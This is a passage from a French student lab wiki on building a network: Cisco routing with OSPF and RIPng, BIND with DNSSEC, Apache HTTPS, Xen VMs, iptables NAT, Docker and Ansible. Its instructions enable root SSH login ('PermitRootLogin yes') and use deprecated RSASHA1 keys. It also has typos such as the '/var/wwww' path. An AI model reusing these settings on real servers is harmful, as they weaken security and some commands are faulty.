  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
Et pour le management&lt;br /&gt;
  interface BDI300&lt;br /&gt;
   ip address 10.60.200.1 255.255.255.0&lt;br /&gt;
   no shut&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues et leur sources une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, '''R - RIP''', M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, '''O - OSPF''', IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
Ansible est un logiciel Open Source qui permet de gérer finement une infrastructure informatique, les déploiements automatisés multi-environnements, les ordinateurs et les configurations systèmes[https://www.syloe.com/glossaire/ansible plus]. Nous allons nous servir de cet outil afin d'automatiser le déploiement de notre site web sur la ferme de serveurs.&lt;br /&gt;
&lt;br /&gt;
====Diffusion de la clé SSH====&lt;br /&gt;
Pour travailler le plus efficacement avec ansible il faut que l'on puissent se connecter en SSH aux machines cibles sans avoir à taper le mot de passe à chaque fois. Pour ce faire, nous devons  ajouter manuellement notre clé publique à la liste des hôtes autorisés sur chaque machine.&lt;br /&gt;
 &lt;br /&gt;
Etape à suivre sur notre machine virtuelle publique:&lt;br /&gt;
* On installe ansible avec un apt-get.&lt;br /&gt;
* On génère une clef asymétrique:&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
* On diffuse la clef publique sur les machines virtuelles privées 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
====Hosts====&lt;br /&gt;
Sur la VM publique et afin de rendre notre inventaire plus explicite, nous ajoutons la configuration des noms d'hôtes à notre /etc/network/hosts:&lt;br /&gt;
 '''root@mycoplasma:~# cat /etc/hosts'''&lt;br /&gt;
 127.0.0.1    localhost&lt;br /&gt;
 127.0.1.1    mycoplasma mycoplasma&lt;br /&gt;
 192.168.0.1	private-6phil&lt;br /&gt;
 192.168.0.2	private-mycoplasma	&lt;br /&gt;
 192.168.0.3	private-herpesgenital&lt;br /&gt;
 192.168.0.4	private-chlamydiae &lt;br /&gt;
 192.168.0.5	private-chaudepisse&lt;br /&gt;
 192.168.0.6	private-blennoragie&lt;br /&gt;
 ...&lt;br /&gt;
&lt;br /&gt;
Toujours sur la VM publique on rédige l'inventaire de notre parc en modifiant ( /etc/ansible/hosts ) c'est un fichier à remplir en utilisant la syntaxe YAML:&lt;br /&gt;
&lt;br /&gt;
 '''root@mycoplasma:~# cat /etc/ansible/hosts'''       &lt;br /&gt;
 all:&lt;br /&gt;
  hosts:&lt;br /&gt;
   mycoplasma:&lt;br /&gt;
  children:&lt;br /&gt;
   webservers:&lt;br /&gt;
    hosts:&lt;br /&gt;
     private-6phil:&lt;br /&gt;
     private-mycoplasma:&lt;br /&gt;
     private-herpesgenital:&lt;br /&gt;
     private-chlamydiae:&lt;br /&gt;
     private-chaudepisse:&lt;br /&gt;
     private-blennoragie:&lt;br /&gt;
   ntp-client:&lt;br /&gt;
    hosts:&lt;br /&gt;
     private-mycoplasma&lt;br /&gt;
   ntp-server:&lt;br /&gt;
    hosts:&lt;br /&gt;
     mycoplasma&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On peut tester notre parc:&lt;br /&gt;
 '''root@mycoplasma:~# ansible all -m ping -o'''&lt;br /&gt;
 private-6phil         | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-mycoplasma    | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-herpesgenital | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-chlamydiae    | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 mycoplasma            | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-chaudepisse   | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
